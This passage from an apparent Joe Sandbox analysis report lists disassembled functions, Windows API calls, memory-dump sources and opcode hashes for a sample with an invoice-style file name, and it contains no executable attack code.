                                                                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                            • Instruction Fuzzy Hash: FE71E876A0071BABD714DE68DC41BBAB7E8AF04724F145229F654F72C1EB74EE009790
                                                                            Function 00F32527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F32542
                                                                            • GetMenuItemInfoW.USER32(00F95890,000000FF,00000000,00000030), ref: 00F325A3
                                                                            • SetMenuItemInfoW.USER32(00F95890,00000004,00000000,00000030), ref: 00F325D9
                                                                            • Sleep.KERNEL32(000001F4), ref: 00F325EB
                                                                            • GetMenuItemCount.USER32(?), ref: 00F3262F
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00F3264B
                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00F32675
                                                                            • GetMenuItemID.USER32(?,?), ref: 00F326BA
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F32700
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F32714
                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F32735
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                            • String ID:
                                                                            • API String ID: 4176008265-0
                                                                            • Opcode ID: 0ff8dcd23173b311c0507597e50454e8c8eadadacd62ff688cd30913029f8e89
                                                                            • Instruction ID: 689ffdb43d55a6d840712d5d1e7c3ab93025ce82d9d2ad3d7af21a08ac1b9ec2
                                                                            • Opcode Fuzzy Hash: 0ff8dcd23173b311c0507597e50454e8c8eadadacd62ff688cd30913029f8e89
                                                                            • Instruction Fuzzy Hash: C3618DB1900249AFDF51CF64DC89EBE7BB8FF45324F180059E942A7251D731AE05EB21
                                                                            Function 00F56F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F56FA5
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F56FA8
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F56FCC
                                                                            • _memset.LIBCMT ref: 00F56FDD
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F56FEF
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F57067
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 830647256-0
                                                                            • Opcode ID: bea6c1709f2858e54177900d6e00bde692c37829d0ef169a18062358172754f5
                                                                            • Instruction ID: ae60550c8d6fdbbb3774bb410bb6403780471be255619a915a7c963e1186936f
                                                                            • Opcode Fuzzy Hash: bea6c1709f2858e54177900d6e00bde692c37829d0ef169a18062358172754f5
                                                                            • Instruction Fuzzy Hash: 91618C71900608AFDB11DFA4DC81EEE77F8EB08710F10019AFA14EB2A1D771AE45EB90
                                                                            Function 00F26B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F26BBF
                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00F26C18
                                                                            • VariantInit.OLEAUT32(?), ref: 00F26C2A
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F26C4A
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00F26C9D
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F26CB1
                                                                            • VariantClear.OLEAUT32(?), ref: 00F26CC6
                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00F26CD3
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F26CDC
                                                                            • VariantClear.OLEAUT32(?), ref: 00F26CEE
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F26CF9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                            • String ID:
                                                                            • API String ID: 2706829360-0
                                                                            • Opcode ID: 966e7dba52c84f9deec5fb175b072cffb8f2ce543767f749ba39bcad522acca2
                                                                            • Instruction ID: 8a0f383828d502b9de948c76b1ea1b1f8b1bc7d3d6c2793b9b93ba184e4800e8
                                                                            • Opcode Fuzzy Hash: 966e7dba52c84f9deec5fb175b072cffb8f2ce543767f749ba39bcad522acca2
                                                                            • Instruction Fuzzy Hash: 90415275A0022D9FCF04EFA4DC449AEBBB9EF48351F008069E955E7261CB31A945DB90
                                                                            Function 00F45732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSAStartup.WS2_32(00000101,?), ref: 00F45793
                                                                            • inet_addr.WS2_32(?), ref: 00F457D8
                                                                            • gethostbyname.WS2_32(?), ref: 00F457E4
                                                                            • IcmpCreateFile.IPHLPAPI ref: 00F457F2
                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F45862
                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F45878
                                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F458ED
                                                                            • WSACleanup.WS2_32 ref: 00F458F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                            • String ID: Ping
                                                                            • API String ID: 1028309954-2246546115
                                                                            • Opcode ID: d989b303c364c19db960e87b855444f3b9dfb79feb2e8941526b5ed6d5877634
                                                                            • Instruction ID: 0d91d46aeea83d0535a8e7ea9f2cfc7a2ece79e2982beecd91e42aea081e3b9f
                                                                            • Opcode Fuzzy Hash: d989b303c364c19db960e87b855444f3b9dfb79feb2e8941526b5ed6d5877634
                                                                            • Instruction Fuzzy Hash: F6515071A047009FDB10EF25DC45B6A7BE4EF48B20F04496AF956EB2A2DB70ED05EB41
                                                                            Function 00F3B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00F3B4D0
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F3B546
                                                                            • GetLastError.KERNEL32 ref: 00F3B550
                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00F3B5BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: ff3d8da0bd4640730099f270b799f13f7b47b5c2afa960f1f0b8929bc2d25289
                                                                            • Instruction ID: 8f276b47c5b5b09c85af773e8e621efc5ab0d54caa1f68a65b1368ca2976255f
                                                                            • Opcode Fuzzy Hash: ff3d8da0bd4640730099f270b799f13f7b47b5c2afa960f1f0b8929bc2d25289
                                                                            • Instruction Fuzzy Hash: 7F318336A00209EFCB40EB68CC55AAD77B4FF84321F584166E605E7295DB70DA42EB51
                                                                            Function 00F28F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00F2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F2AABC
                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F29014
                                                                            • GetDlgCtrlID.USER32 ref: 00F2901F
                                                                            • GetParent.USER32 ref: 00F2903B
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F2903E
                                                                            • GetDlgCtrlID.USER32(?), ref: 00F29047
                                                                            • GetParent.USER32(?), ref: 00F29063
                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F29066
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1536045017-1403004172
                                                                            • Opcode ID: 5725eda85ece4732c6a2430310883f2106dfdb1854c67e6297ec4a8970a14ff4
                                                                            • Instruction ID: 0e81c127f29fb159a1e5b0cef622e0a2d1927939c8d32aeda8ce4d1383dbe242
                                                                            • Opcode Fuzzy Hash: 5725eda85ece4732c6a2430310883f2106dfdb1854c67e6297ec4a8970a14ff4
                                                                            • Instruction Fuzzy Hash: 6621F871A00208BBDF04EBA4DC85EFEBBB5EF49310F100156F961972A1DB759819EB21
                                                                            Function 00F2907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00F2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F2AABC
                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F290FD
                                                                            • GetDlgCtrlID.USER32 ref: 00F29108
                                                                            • GetParent.USER32 ref: 00F29124
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F29127
                                                                            • GetDlgCtrlID.USER32(?), ref: 00F29130
                                                                            • GetParent.USER32(?), ref: 00F2914C
                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F2914F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1536045017-1403004172
                                                                            • Opcode ID: d1cdc688c859ca634415dbdc8972ca8afc87b6d8f623a4bd468df6c2dee873a3
                                                                            • Instruction ID: b3af426b3d7af6167d187d388df1a27f0c47b981c3ff51bc240cc605efda8df4
                                                                            • Opcode Fuzzy Hash: d1cdc688c859ca634415dbdc8972ca8afc87b6d8f623a4bd468df6c2dee873a3
                                                                            • Instruction Fuzzy Hash: 9C210775E00208BBDF00ABA4DC85FFEBBB4EF44300F100056FA51A72A1DB798819EB20
                                                                            Function 00F29163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32 ref: 00F2916F
                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00F29184
                                                                            • _wcscmp.LIBCMT ref: 00F29196
                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F29211
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                            • API String ID: 1704125052-3381328864
                                                                            • Opcode ID: 14fb1b3e3307c811b9f7e1aad3796d02a0afd832e6d731cabe03c159bc5aa7b9
                                                                            • Instruction ID: 84ec8e06d150c51cd27edc5c825b80588ac8b76ef471f53eae37d53b66741933
                                                                            • Opcode Fuzzy Hash: 14fb1b3e3307c811b9f7e1aad3796d02a0afd832e6d731cabe03c159bc5aa7b9
                                                                            • Instruction Fuzzy Hash: B011E73664C31BB9EA113664FC0AEB737DC9B15730F30006AFB10E60D2FEA1A8517695
                                                                            Function 00F488AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 00F488D7
                                                                            • CoInitialize.OLE32(00000000), ref: 00F48904
                                                                            • CoUninitialize.COMBASE ref: 00F4890E
                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00F48A0E
                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F48B3B
                                                                            • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,00F62C0C), ref: 00F48B6F
                                                                            • CoGetObject.OLE32(?,00000000,00F62C0C,?), ref: 00F48B92
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00F48BA5
                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F48C25
                                                                            • VariantClear.OLEAUT32(?), ref: 00F48C35
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2395222682-0
                                                                            • Opcode ID: 1b48d70edbc917e4435e48b0b17c02a86c2225ba47bda200b66a9e6f1c2bf6a1
                                                                            • Instruction ID: eb84929b0ee79a23dac9962dbd3ce14c236fd5fe875387c497cfdc3c3be37c84
                                                                            • Opcode Fuzzy Hash: 1b48d70edbc917e4435e48b0b17c02a86c2225ba47bda200b66a9e6f1c2bf6a1
                                                                            • Instruction Fuzzy Hash: ECC115B1608305AFC700EF64C88492BBBE9FF89798F00495DF9899B251DB71ED06DB52
                                                                            Function 00F37990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00F37A6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafeVartype
                                                                            • String ID:
                                                                            • API String ID: 1725837607-0
                                                                            • Opcode ID: 8bac33cf252c2ff2a3a108c6665e85ec114cfc55f46f9882deaf500a86ca12af
                                                                            • Instruction ID: 73e2e44dab5b17db8d0a92d66641ba662693cbb2c3511ba127bb857f0bc52a9e
                                                                            • Opcode Fuzzy Hash: 8bac33cf252c2ff2a3a108c6665e85ec114cfc55f46f9882deaf500a86ca12af
                                                                            • Instruction Fuzzy Hash: D8B15DB190831A9FDB20EF94C885BBEB7F4EF49331F245469E601E7251D734A941EBA0
                                                                            Function 00F311CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00F311F0
                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F30268,?,00000001), ref: 00F31204
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00F3120B
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30268,?,00000001), ref: 00F3121A
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F3122C
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30268,?,00000001), ref: 00F31245
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30268,?,00000001), ref: 00F31257
                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F30268,?,00000001), ref: 00F3129C
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F30268,?,00000001), ref: 00F312B1
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F30268,?,00000001), ref: 00F312BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: e609a8aed0e15d6b0ca6441cb55049bc53412327c3a23648f643a3033c99c48f
                                                                            • Instruction ID: 624af44c813777ead45ce03086e87d393ca74456b767754f7510f724ae4cf6c0
                                                                            • Opcode Fuzzy Hash: e609a8aed0e15d6b0ca6441cb55049bc53412327c3a23648f643a3033c99c48f
                                                                            • Instruction Fuzzy Hash: 0B316D75A00308BBDB209F54EC88F6A77A9BB55336F108166FE05D62A0E7B4DD44AF60
                                                                            Function 00EDFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EDFAA6
                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00EDFB45
                                                                            • UnregisterHotKey.USER32(?), ref: 00EDFC9C
                                                                            • DestroyWindow.USER32(?), ref: 00F145D6
                                                                            • FreeLibrary.KERNEL32(?), ref: 00F1463B
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F14668
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 469580280-3243417748
                                                                            • Opcode ID: 2b7e894197dcd9fe5ab544225e360fe080ec5159c11fe0d58c5547d7b17e0a9e
